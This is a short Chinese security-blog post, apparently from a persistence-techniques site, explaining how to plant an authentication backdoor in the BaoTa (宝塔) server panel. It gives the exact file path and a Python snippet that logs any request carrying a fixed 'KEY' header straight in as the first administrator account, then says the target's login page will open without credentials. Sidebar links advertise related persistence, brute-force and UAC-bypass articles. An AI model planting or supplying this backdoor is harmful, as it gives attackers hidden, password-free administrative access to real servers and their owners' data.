宝塔面板之定义一个自动登录后门

宝塔面板之定义一个自动登录后门

08611

修改代码:/www/server/panel/BTPanel/__init__.py 中寻找到 

# 登录输入验证
f request.method == method_post[0]:

在前面加入代码:

from flask import request
import userlogin
if request.headers.get('KEY') == '123456789':
    userInfo = public.M('users').where('id=?', (1,)).field('id,username,password,salt').find()
    return userlogin.userlogin()._set_login_session(userInfo)

只需要访问目标:http://1.1.1.1/login 后就能直接登录成功!

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
隐匿行踪
喜欢就支持一下吧
点赞11 分享
root的头像-赤道学院
权限维持之隐藏计划任务多版本实战演示-赤道学院
权限维持之隐藏计划任务多版本实战演示
权限维持之隐藏计划任务多版本实战演示
8个月前 897
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址-赤道学院
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址
9个月前 236
SSRF漏洞之Gopher协议发起GET与POST请求-赤道学院
SSRF漏洞之Gopher协议发起GET与POST请求
SSRF漏洞之Gopher协议发起GET与POST请求
8个月前 231
Windows 管理员账户空密码如何实现登陆?-赤道学院
Windows 管理员账户空密码如何实现登陆?
Windows 管理员账户空密码如何实现登陆?
8个月前 180
BurpSuite进行后台管理员账户密码爆破-赤道学院
BurpSuite进行后台管理员账户密码爆破
BurpSuite进行后台管理员账户密码爆破
8个月前 171
SQL注入+文件下载实现任意文件读取-赤道学院
SQL注入+文件下载实现任意文件读取
SQL注入+文件下载实现任意文件读取
9个月前 169
相关推荐
评论 抢沙发

请登录后发表评论

    暂无评论内容

用户封面
root的头像-赤道学院
开启XP_CMDSHELL的多种方案
宝塔将指定Header Key的所有请求日志不存储到数据库
Stunnel + HaProxy + Danted 打造属于自己的 Socket5 代理池
PowerShell修改lnk属性实现BypassUac
Ubuntu 开启证书登录与密钥登录双模式运行
权限维持之隐藏计划任务多版本实战演示
热门文章
权限维持之隐藏计划任务多版本实战演示-赤道学院
897人已阅读
权限维持之隐藏计划任务多版本实战演示
TOP1
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址-赤道学院
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址
9个月前236人已阅读
TOP2
SSRF漏洞之Gopher协议发起GET与POST请求-赤道学院
SSRF漏洞之Gopher协议发起GET与POST请求
8个月前231人已阅读
TOP3
Windows 管理员账户空密码如何实现登陆?-赤道学院
Windows 管理员账户空密码如何实现登陆?
8个月前180人已阅读
TOP4
BurpSuite进行后台管理员账户密码爆破-赤道学院
BurpSuite进行后台管理员账户密码爆破
8个月前171人已阅读
TOP5
SQL注入+文件下载实现任意文件读取-赤道学院
SQL注入+文件下载实现任意文件读取
9个月前169人已阅读
TOP6
标签云
电信诈骗 (1)文件读取 (1)文件下载 (1)文件上传 (1)反向代理 (1)劫持数据 (1)冒充公检法 (1)任意文件上传 (1)代码执行 (1)上传拦截 (1)tomcat (1)thinkphp5.0.13 (1)SQL注入 (1)nginx (1)getshell (1)CDN (1)
最新评论